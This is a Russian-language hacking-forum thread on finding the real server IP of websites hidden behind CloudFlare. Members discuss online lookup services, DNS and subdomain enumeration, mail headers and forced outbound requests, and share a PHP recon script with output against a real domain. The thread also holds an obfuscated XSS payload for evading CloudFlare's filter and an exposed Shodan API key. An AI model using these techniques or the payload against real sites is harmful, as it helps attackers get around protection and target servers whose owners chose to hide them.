CloudFlare Bypass

Discussion in 'Кухня' started by Mister_Bert0ni, 30 May 2015.

  1. Mister_Bert0ni

    Mister_Bert0ni Reservists Of Antichat

    Joined:
    10 May 2015
    Messages:
    142
    Likes Received:
    190
    Reputations:
    57
    Что такое CloudFlare?
    CloudFlare – это сервис по обслуживанию и обеспечению безопасности.
    Часто различные сайты прячут за ним свой реальный IP.
    [​IMG]
    Для того что бы разкрыть реальный IP будем использовать известные онлайн тулзы.
    И так для примера возмем сайт c CloudFlare
    PHP:
    http://gre4ka.info
    Для начала проверим IP:
    Code:
    ping gre4ka.info
    Получим IP:104.28.18.120
    [​IMG]

    Пробуемм подключится по 80 порту:
    Получем ошибку из которой видно что IP пренадлежит CloudFlare
    [​IMG]
    Дальше идем на сайт сервис по раскрытию IP -адресов которые прячутся за CloudFlare:
    PHP:
    http://www.crimeflare.com/cfs.html
    И просто в поиске вбиваем наш сайт...
    В итоге получаем реальный IP:
    Code:
     gre4ka.info 146.185.128.222
    [​IMG]
    Проверяем прямое подключение по IP на 80 порт:
    Получаем сайт уже без CloudFlare.Дальше уже спокойно можно работать с софтом и проводит аудит не только веб-приложения но и целевой системы(сканить порты,сервисы и т.д...)
    [​IMG]
    Еще как вариант можно использовать утилитку DIG для того что разкрыть возможные dns-имена,затем пинговать их:
    [​IMG]
    Но в нашем случае все записи не принадлежат реальному IP (
    Еще один способ разкрытия реального IP сайта - это через почту.Это может быть регистрация на сайте или любой другой способ вынудить отправить вам письмо с веб сервера.И в теле письма посмотреть IP адрес.
     
    #1 Mister_Bert0ni, 30 May 2015
    Last edited: 30 May 2015
  2. CyberTro1n

    CyberTro1n Elder - Старейшина

    Joined:
    20 Feb 2016
    Messages:
    1,077
    Likes Received:
    854
    Reputations:
    14
    Нашел)) спасибо! nmap можно добавить. А что еще взять если нет возможности отправить письмо(не с сервер), или же вообще отправка не привязана к реальному ипу?
     
    quite gray likes this.
  3. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Способов-то много, но не один не является идеальным.
     
    CyberTro1n likes this.
  4. CyberTro1n

    CyberTro1n Elder - Старейшина

    Joined:
    20 Feb 2016
    Messages:
    1,077
    Likes Received:
    854
    Reputations:
    14
    Например? Заметил, сегодня юзану по этой теме. Интересно что получится. А на другой стороне мои действия как отображаться могут, отображается?
     
    quite gray likes this.
  5. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Логи, ну я хз, шодан как вариант, придумывать надо, надо изучать тему.
     
    quite gray likes this.
  6. CyberTro1n

    CyberTro1n Elder - Старейшина

    Joined:
    20 Feb 2016
    Messages:
    1,077
    Likes Received:
    854
    Reputations:
    14
    Логи однозначно) в системе клауда и в самой цели?
     
    #6 CyberTro1n, 29 Sep 2016
    Last edited: 30 Sep 2016
    quite gray likes this.
  7. Djoser

    Djoser Member

    Joined:
    9 Nov 2015
    Messages:
    52
    Likes Received:
    11
    Reputations:
    0
    такой вопрос, а что если сервер по ip не открывается, как быть в таком случае? там наврно могут быть какие-то проверики? типа пришел не с клауд сервера а прямо....
     
    quite gray likes this.
  8. CyberTro1n

    CyberTro1n Elder - Старейшина

    Joined:
    20 Feb 2016
    Messages:
    1,077
    Likes Received:
    854
    Reputations:
    14
    [​IMG]

    я знаю что долго в кс играл. не пойму как столько доменов на одном ипе. как дальше идти, крутить?
     
  9. zifus

    zifus Member

    Joined:
    15 Aug 2015
    Messages:
    85
    Likes Received:
    11
    Reputations:
    0
    Как вариант ещё можно посмотреть историю изменения IP. Тот же viewdns.info может показать историю.
     
    quite gray likes this.
  10. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    https://medium.com/@denyfebriant/bypass-xss-filter-cloudflare-on-indodax-com-526fb32ffa08
    Code:
    Свежий bypass xss фильтра Cloudflare %22}%3C%2500svg%26%23x09%3bx%2f%2500onload%3d%26%230000097%26%230000108%26%230000101%26%230000114%26%230000116%26%230000040%26%230000100%26%230000111%26%230000099%26%230000117%26%230000109%26%230000101%26%230000110%26%230000116%26%230000046%26%230000100%26%230000111%26%230000109%26%230000097%26%230000105%26%230000110%26%230000041%3E
    
     
    _________________________
  11. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    _________________________
    eminlayer7788, joelblack and crlf like this.
  12. MstCard

    MstCard New Member

    Joined:
    1 Jun 2018
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    dnsdumper, sublist3r, cloudfail это же обратный прокси, насколько знаю обходится поиском ипа которые не за клаудом.
     
  13. a1tiRi

    a1tiRi New Member

    Joined:
    11 Jun 2018
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
  14. none222

    none222 Guest

    Reputations:
    0
    ^^^^^^^^^^^^^^^^^^^^^###^^^^^^^^^^
    ^^^^^^^^^^^^^^^^#####^^^^####^^^^^^
    ^^^^^^^^^^^^^^#^#^#^^^^#^^^^^#^^^^^
    ^^^^^^^^^^^^^#^#^^#^^#^^^^^#^^#^^^^
    ^^^^^^^^^^^^^#^#^#^#^#^^^##^^^#^^^^
    ^^^^^^#^^^^^#^^^#^#^#^####^^^#^^^^^
    ^^^^^^##^^^^#^^^#^#^^^^#^^^#^#^^^^^
    ^^^^^^###^^^^#^^^#^#^^^#^^#^^^#^^^^
    ^^^^^^#####^^^#^^#^^#^^##^^^^^#^^^^
    ^^^^^^^#####^^^############^^##^^^^
    ^^^^^^^^^^##^^^^##^^^^######^^^^^^^
    ^^^^^^^^^^^##^^###^####^^^^^^^^^^^^
    ^^^^^^^^^^^#####^^^^^^^^^^^^^^^^^^^
    ^^^^^^^^^^###^^^^####^^^^^^^^^^^^^^
    ^^^^^^^^^##^^^^^^^#####^^^^^^^^^^^^
    ^^^^^^^^##^^^^^^^^^^####^^^^^^^^^^^
    ^^^^^^^##^^^^^^^^^^^^###^^^^^^^^^^^
    ^^^^^^##^^^^^^^^^^^^^^^#^^^^^^^^^^^
     
    #15 none222, 20 Dec 2018
    Last edited by a moderator: 6 Nov 2020
  15. xmp

    xmp Member

    Joined:
    14 Dec 2018
    Messages:
    13
    Likes Received:
    9
    Reputations:
    4
    Ещё из методов: если есть аплоуд на сайте можно грузить фаил/картинку и смотреть реальный ип в логах.

    Решил попрактиковатся и собрать всё в кучу:
    Code:
    <?php
    $start = microtime(true);
    
    $host = '100yellow.com';
    
    
    function get_cookie($host){
    $ch = curl_init('http://'.$host);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    $result = curl_exec($ch);
    preg_match_all('/^Set-Cookie:\s*([^;]*)/mi', $result, $matches);
    $cookies = array();
    foreach($matches[1] as $item) {
        parse_str($item, $cookie);
        $cookies = array_merge($cookies, $cookie);
    }
    return $cookies;
    }
    
    
    
    function fixed_gethostbyname($host) {
        $ip = gethostbyname($host);
        if ($ip != $host) { return $ip; }// else return false;
    }
    
    function cidr_match($ip) {
    
    $cloud = array("103.21.244.0/22",
                   "103.22.200.0/22",
                   "103.31.4.0/22",
                   "104.16.0.0/12",
                   "108.162.192.0/18",
                   "131.0.72.0/22",
                   "141.101.64.0/18",
                   "162.158.0.0/15",
                   "172.64.0.0/13",
                   "173.245.48.0/20",
                   "188.114.96.0/20",
                   "190.93.240.0/20",
                   "197.234.240.0/22",
                   "198.41.128.0/17");
    
    foreach($cloud as $cidr) {
       list($subnet, $mask) = explode('/', $cidr);
       if ((ip2long($ip) & ~((1 << (32 - $mask)) - 1) ) == ip2long($subnet)) {
       return true;
      }
       continue;
      }
       return false;
    }
    
    $subDomainList = array("www","www2","ftp","mail", "irc",
                  "smtp","pop","staging", "demo", "mx", "mx2",
                  "stage","test","testing", "tmp",
                  "temp", "ns","ns2","vpn","firewall",
                  "ssh","content","images", "img",
                  "docs","doc","dl","services","api",
                  "erp","storage","cloud", "cdn", "encrypted",
                  "finance","blog","english",
                  "forum","forums","board","boards");
    
    $ip = fixed_gethostbyname($host);
    $ips = array();
    $good = array();
    
    if(isset($ip)){
     $result = cidr_match($ip);
    if($result == 'true'){
    foreach($subDomainList as $subDomain) {
      $ips[] = fixed_gethostbyname($subDomain.'.'.$host);
    }
    foreach($ips as &$ip){
            $result = cidr_match($ip);
      if($result != 1){
         $good[] = $ip;
      }
    }
    }
      }
     else{
         print $host. ':' .$ip;
         die();
     }
    
    $shodan = file_get_contents('https://api.shodan.io/shodan/host/search?key=efdP1hAuSjwzJ1yDcU13hj2YPQJJ8ush&query='.$host);
    $shodan = json_decode($shodan);
    
    $dns = dns_get_record($host);
    
    print $host. PHP_EOL;
    print 'dns records: '. PHP_EOL;
    print_r($dns). PHP_EOL;
    print 'subdomain ips: '. PHP_EOL;
    print_r($good);
    print 'shodan: '. PHP_EOL;
    print_r($shodan). PHP_EOL;
    print 'Cookie:'. PHP_EOL;
    print_r(get_cookie($host));
    
    
    print 'time: '.round(microtime(true) - $start, 4).' sec.';
    
    
    
    аутпут:
    Code:
    "/usr/bin/php" "/home/user/opencart/cloudflare.php"
    100yellow.com
    dns records:
    Array
    (
        [0] => Array
            (
                [host] => 100yellow.com
                [class] => IN
                [ttl] => 2733
                [type] => HINFO
                [cpu] => ANY obsoleted
                [os] => See draft-ietf-dnsop-refuse-any
            )
    
    )
    subdomain ips:
    Array
    (
        [0] =>
        [1] => 139.59.29.219
        [2] => 97.74.135.10
        [3] =>
        [4] => 72.167.238.29
        [5] => 97.74.135.10
        [6] =>
        [7] =>
        [8] =>
        [9] =>
        [10] =>
        [11] =>
        [12] =>
        [13] =>
        [14] =>
        [15] =>
        [16] =>
        [17] =>
        [18] =>
        [19] =>
        [20] =>
        [21] =>
        [22] =>
        [23] =>
        [24] =>
        [25] =>
        [26] =>
        [27] =>
        [28] =>
        [29] =>
        [30] =>
        [31] =>
        [32] =>
        [33] =>
        [34] =>
        [35] =>
        [36] =>
        [37] =>
        [38] =>
    )
    shodan:
    stdClass Object
    (
        [matches] => Array
            (
            )
    
        [total] => 0
    )
    Cookie:
    Array
    (
        [__cfduid] => dc2e8b1b92037edbb4c18f6ff9f2aba3c1549291585
    )
    time: 4.7554 sec.
    Done.
    
    
    
    shodan - мимо.
    subдомены - дали реальный результат.


    139.59.29.219 - редирект на www.139.59.29.219
    Как задетектить что ип пренадлежит домену?
    Сравнению контента мешает капча при клауд домене, детекчу по кукам. Кто знает вариант как обойти?
     
    #16 xmp, 4 Feb 2019
    Last edited: 4 Feb 2019
    grimnir likes this.
  16. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,174
    Likes Received:
    1,157
    Reputations:
    202
    https://github.com/KyranRana/cloudflare-bypass этот обходит CF UAM page. Там 2 метода - curl и сокеты. Код на курле почему-то не захотел работать а сокеты проходят проверку.
     
    xmp likes this.
  17. pas9x

    pas9x Elder - Старейшина

    Joined:
    13 Oct 2012
    Messages:
    423
    Likes Received:
    585
    Reputations:
    52
    Из методов которые я знаю:
    1. Если на сайте есть регистрация или какая-либо возможность отправки почты то регаемся (или заставляем сайт отправить нам письмо) и смотрим айпишник сервера в заголовках письма. В 95% случаев письмо отправляется с самого сервера. Хотя некоторые сайты используют внешний smtp типа mailgun, тогда этот способ не проканает.
    2. Если на сайте есть возможность заливки аватара по ссылке (или любая другая возможность заставить перейти сайт по ссылке) то можно заставить сайт перейти по ссылке и в логах сервера при обращении к твоей ссылке будет виден айпишник сервера.
     
    FireRidlle, quite gray and dehimb like this.
  18. PapaRed

    PapaRed Elder - Старейшина

    Joined:
    30 Jun 2010
    Messages:
    23
    Likes Received:
    70
    Reputations:
    26
  19. Тот_самый_Щуп

    Тот_самый_Щуп Reservists Of Antichat

    Joined:
    23 Mar 2017
    Messages:
    265
    Likes Received:
    174
    Reputations:
    119
    Code:
    // -- 3. Get JavaScript answer.
    eval( $iuam_jschl );
    
    Клоуд будет очень доволен.